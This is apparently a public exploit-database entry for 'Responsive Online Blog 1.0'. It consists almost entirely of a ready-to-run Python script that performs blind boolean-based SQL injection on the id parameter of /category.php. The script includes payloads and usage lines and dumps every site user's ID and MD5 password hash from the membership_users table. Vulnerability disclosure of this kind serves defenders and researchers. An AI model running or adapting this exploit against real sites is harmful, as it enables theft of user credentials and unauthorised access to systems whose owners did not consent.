# Exploit Title: Responsive Online Blog 1.0 - Blind Boolean-based SQLi # Date: 2022-04-16 # Exploit Author: Gideon Kamioka (@w1ezl) # Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL # Version: v1.0 # Tested on: XAMPP Linux/7.4.7 # Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, # which can provide attackers with access to the username and md5 hash of all site users. # Vulnerable file: /category.php # Usage: python3 exploit.py http://localhost/blog/category.php # Proof of Concept: #!/usr/bin/python3 import sys,requests,re def cred_Length(ip,p,max): f = requests.get(ip, params=f'id={p.replace("[i]",str(125))}', verify=False) failLen=len(f.text) for k in reversed(range(1,max)): r = requests.get(ip, params=f'id={p.replace("[i]",str(k))}', verify=False) if (len(r.text) != failLen): return k return None def search_Credentials(ip, p): charlist="abcdefghijklmnopqrstuvwxyz0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\\\'()*+,-./:;<=>?@{|}~[]^_`" f = requests.get(ip, params=f'id={p.replace("[CHAR]",str(125))}', verify=False) failLen=len(f.text) for k in charlist: r = requests.get(ip, params=f'id={p.replace("[CHAR]",str(ord(k)))}', verify=False) if (len(r.text) != failLen): return ord(k) return None def logo(): art = R''' ░░░░ ░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░████░░░░░░████░░░░░░ ░░░░░░████░░░░░░████░░░░░░ ░░░░░░████░░░░░░████░░░░░░ ░░░░░░████░░░░░░████░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░ ''' info = "\033[0;34mResponsive Online Blog 1.0 /category.php\033[0m -\n Boolean based Blind Credential Extractor" credits = 'Created by \033[1;35m@w1ezl\033[0m'.center(80) warning= "\033[3mThis script could take up to \033[1;31;103m10 minuites\033[0m\033[3m to extract a single credential.\nGo get cofee and chill or something.\033[0m" print(f"{art}\n{info}\n{credits}\n\n{warning}\n\n") def main(): logo() if len(sys.argv) != 2: print(f"(+) Usage python3 {sys.argv[0]} ") print(f"(+) Eg: python3 {sys.argv[0]} http://localhost/blog/category.php") sys.exit(-1) target = sys.argv[1] payloadA = "1'AND+(SELECT+count(*)+FROM+membership_users)=[i]--+-" payloadB = "1'AND+length(substring((SELECT+CONCAT(memberID,':',passMD5)+FROM+membership_users+LIMIT+1+OFFSET+[o]),1,60))=[i]--+-" payloadC = "1'AND+ascii(substring((SELECT+CONCAT(memberID,':',passMD5)+FROM+membership_users+LIMIT+1+OFFSET+[o]),[i],1))=[CHAR]--+-" print("(+) Starting Exploit:") n = cred_Length(target, payloadA, 30) if n is None: print("(+) No creds Found:") print("(+) exiting...") sys.exit(-1) else: print(f"(+) {n-1} creds Found:") for i in range(0,n-1): b = payloadB.replace("[o]",str(i)) credLen = cred_Length(target, b, 60) for j in range (1, credLen+1): p = payloadC.replace("[i]",str(j)) c = p.replace("[o]",str(i)) sys.stdout.write(chr(search_Credentials(target, c))) sys.stdout.flush() print('') print("done") if __name__ == '__main__': main()